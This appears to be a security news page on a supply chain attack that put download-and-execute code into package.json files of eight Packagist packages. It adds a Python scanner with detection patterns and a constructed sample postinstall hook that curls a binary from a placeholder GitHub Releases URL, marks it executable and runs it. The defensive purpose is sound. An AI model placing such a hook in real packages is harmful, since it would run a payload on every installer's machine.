
Supply Chain Attack Targets Packagist, Infects Eight Packages
Tags: Cybersecurity, Supply Chain Attack, Packagist, Composer, JavaScript, Malware, GitHub, Linux
A coordinated supply chain attack targeted eight packages on Packagist, embedding malicious code that downloads a Linux binary from a GitHub Releases URL and executes it. The affected packages are Composer packages, but the payload was placed in a package.json file rather than in composer.json, so it specifically affects projects that ship and install the packages' bundled JavaScript components. A package.json file runs code only through its `scripts` entries, which npm executes as lifecycle hooks (for example `postinstall`) during installation; the report does not say which hook was used. Because composer.json and the PHP dependency declarations were left untouched, the change does not show up in Composer-level dependency diffs or audits and is only reached through the JavaScript tooling. The report gives no dates, CVE IDs, or attribution. Fetching the binary from GitHub Releases is a deliberate use of a trusted platform for payload delivery: such downloads blend in with legitimate traffic and are rarely blocked.
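One check a practitioner would want after reading the above: walk a Composer `vendor/` tree (or any checkout) and flag package.json lifecycle hooks that pull something from a GitHub Releases URL or otherwise download and execute a file. This is an added example written for this page, not code from the report or from any of the affected packages; the indicator patterns, the set of hook names considered, the directory layout and the two sample manifests (including the example-org URL and file names) are all constructed assumptions, not data from the incident.

```python
"""Scan a source tree for package.json lifecycle scripts that download and
run remote files.  Added example for this page; not code from the report or
from any affected package.  Indicator patterns and sample manifests below
are constructed for illustration."""
import json
import os
import re
import tempfile

# npm runs these hooks automatically during `npm install` / `npm ci`.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# Indicator patterns (assumed, not taken from the report): a GitHub Releases
# download URL, a fetch tool, making a file executable, or piping to a shell.
INDICATORS = {
    "github_release_url": re.compile(r"github\.com/[^/\s]+/[^/\s]+/releases/download/"),
    "fetch_tool": re.compile(r"\b(curl|wget)\b"),
    "make_executable": re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\b"),
    "pipe_to_shell": re.compile(r"\|\s*(ba|z|da)?sh\b"),
}


def scan_manifest(text, path="package.json"):
    """Return one finding per lifecycle hook whose command matches an indicator."""
    findings = []
    try:
        data = json.loads(text)
    except json.JSONDecodeError:
        return findings  # not valid JSON; nothing to inspect
    scripts = data.get("scripts") if isinstance(data, dict) else None
    if not isinstance(scripts, dict):
        return findings
    for hook, command in scripts.items():
        if hook not in LIFECYCLE_HOOKS or not isinstance(command, str):
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(command)]
        if hits:
            findings.append({"path": path, "hook": hook,
                             "command": command, "indicators": hits})
    return findings


def scan_tree(root):
    """Walk a directory (e.g. a Composer vendor/ tree) and scan every package.json."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        if "package.json" in filenames:
            path = os.path.join(dirpath, "package.json")
            with open(path, encoding="utf-8") as fh:
                findings.extend(scan_manifest(fh.read(), path))
    return findings


# Constructed sample manifests (not the real manifests from the incident).
BENIGN_MANIFEST = json.dumps({
    "name": "vendor-widget",
    "scripts": {"build": "webpack --mode production", "test": "jest"},
})

SUSPICIOUS_MANIFEST = json.dumps({
    "name": "vendor-widget",
    "scripts": {
        "build": "webpack --mode production",
        # Hypothetical URL and file names, standing in for the real payload.
        "postinstall": ("curl -sL https://github.com/example-org/example-repo"
                        "/releases/download/v1.0/helper -o /tmp/.h"
                        " && chmod +x /tmp/.h && /tmp/.h"),
    },
})


def demo():
    """Write the two sample manifests into a temporary vendor/ tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for pkg, manifest in (("vendor/acme/clean", BENIGN_MANIFEST),
                              ("vendor/acme/tampered", SUSPICIOUS_MANIFEST)):
            os.makedirs(os.path.join(root, pkg))
            with open(os.path.join(root, pkg, "package.json"), "w",
                      encoding="utf-8") as fh:
                fh.write(manifest)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']}: {f['hook']} -> {', '.join(f['indicators'])}")
```

The check is indicator-based, so treat it as triage rather than proof of absence: a hook that simply runs `node install.js` moves the download logic into a file the scanner never reads, and obfuscated commands will not match these patterns. Review every lifecycle hook in vendored JavaScript by hand when the scan is clean, and prefer `npm ci --ignore-scripts` in CI so that such hooks cannot run at all unless explicitly allowed.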